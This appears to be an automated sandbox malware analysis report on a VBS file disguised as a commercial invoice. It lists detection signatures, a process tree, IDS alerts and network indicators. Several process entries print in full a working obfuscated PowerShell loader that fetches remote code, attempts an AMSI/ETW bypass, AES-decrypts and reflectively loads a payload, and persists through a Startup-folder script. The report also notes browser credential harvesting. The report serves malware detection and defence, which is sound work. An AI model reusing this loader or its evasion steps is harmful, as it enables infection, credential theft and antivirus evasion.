
Windows Analysis Report
Commercial Invoice Confirmation-1132346.vbs

Overview

General Information

Sample name: Commercial Invoice Confirmation-1132346.vbs
Analysis ID: 1617742
MD5: f268af24198f756977b03b521f23e96c
SHA1: b5ae78ce8541943b14f48c5003d0c2e306bfae96
SHA256: ac3080be59227ea4650f78500acb8b8de9d2e51089b5d39475ba9b368731b8a6
Tags: vbs, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
VBScript performs obfuscated calls to suspicious functions
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

  • System is w10x64
  • wscript.exe (PID: 7840 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Commercial Invoice Confirmation-1132346.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7924 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7984 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 8036 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 8044 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • powershell.exe (PID: 8180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 6064 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5296 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1976 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 1984 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 2512 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJT
Source: Process started | Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJT
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Commercial Invoice Confirmation-1132346.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Commercial Invoice Confirmation-1132346.vbs", CommandLine|base64offset|contains: "{, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Commercial Invoice Confirmation-1132346.vbs", ProcessId: 7840, ProcessName: wscript.exe
Source: Process started | Author: Hieu Tran: Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJT
Source: Process started | Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Commercial Invoice Confirmation-1132346.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Commercial Invoice Confirmation-1132346.vbs", CommandLine|base64offset|contains: "{, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Commercial Invoice Confirmation-1132346.vbs", ProcessId: 7840, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7984, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8044, ProcessName: powershell.exe

Data Obfuscation

Source: File created | Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8044, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd
Suricata IDS alerts

Timestamp                        SID      Severity  Classtype                Source IP    Source Port  Destination IP   Destination Port  Protocol
2025-02-18T08:24:35.435140+0100  2803274  2         Potentially Bad Traffic  192.168.2.8  49706        132.226.247.73   80                TCP
2025-02-18T08:24:51.638349+0100  2803274  2         Potentially Bad Traffic  192.168.2.8  49711        132.226.247.73   80                TCP
2025-02-18T08:24:33.715621+0100  1810000  2         Potentially Bad Traffic  192.168.2.8  49705        168.119.145.117  443               TCP
2025-02-18T08:24:49.980780+0100  1810000  2         Potentially Bad Traffic  192.168.2.8  49710        168.119.145.117  443               TCP


AV Detection

Source: Commercial Invoice Confirmation-1132346.vbs | Virustotal: Detection: 13%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.6% probability

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 104.21.16.1
Source: Joe Sandbox View | IP Address: 104.21.16.1
Source: Joe Sandbox View | IP Address: 168.119.145.117
Source: Joe Sandbox View | IP Address: 132.226.247.73
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49706 -> 132.226.247.73:80
